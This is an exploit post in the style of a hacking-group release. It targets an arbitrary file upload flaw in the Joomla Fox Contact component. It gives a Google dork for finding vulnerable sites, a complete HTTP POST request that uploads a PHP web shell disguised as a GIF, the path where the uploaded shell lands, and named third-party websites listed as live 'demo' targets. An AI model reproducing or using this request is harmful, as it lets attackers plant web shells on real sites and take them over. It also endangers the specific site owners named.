##########################
# Exploit Title: Joomla Component  Arbitrary File Upload  shell  Vulnerability
# Dork Google: allinurl:index.php?option=com_foxcontact
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Discovered By: Hacker Khan
# vendor Home:  http://www.fox.ra.it/
# Version: 1.0
# Tested on : Linux-Windows7
##########################

# Exploit

-HTTP Header Example-
POST http://www.cavedegruissan.com/particulars/components/com_foxcontact/lib/file-uploader.php?cid=289&mid=0&qqfile=shell.php HTTP/1.1
Host: www.cavedegruissan.com
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-File-Name: shell.php
Content-Type: image/jpeg
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

GIF89a<?php shell ?>

############################

Shell path:

www.site.com/components/com_foxcontact/uploads/filename.php

###########################

Demo :

http://www.cavedegruissan.com/component/hikashop/FT/index.php?option=com_foxcontact&view=foxcontact&Itemid=131

http://www.nebulaagencies.com.au/index.php?option=com_foxcontact&view=foxcontact&Itemid=113


##############################

#Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran ||Ormazd ||Sh@d0w ||

MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier ||

And All Of Iranian Anonymous .

# Discovered By: Hacker Khan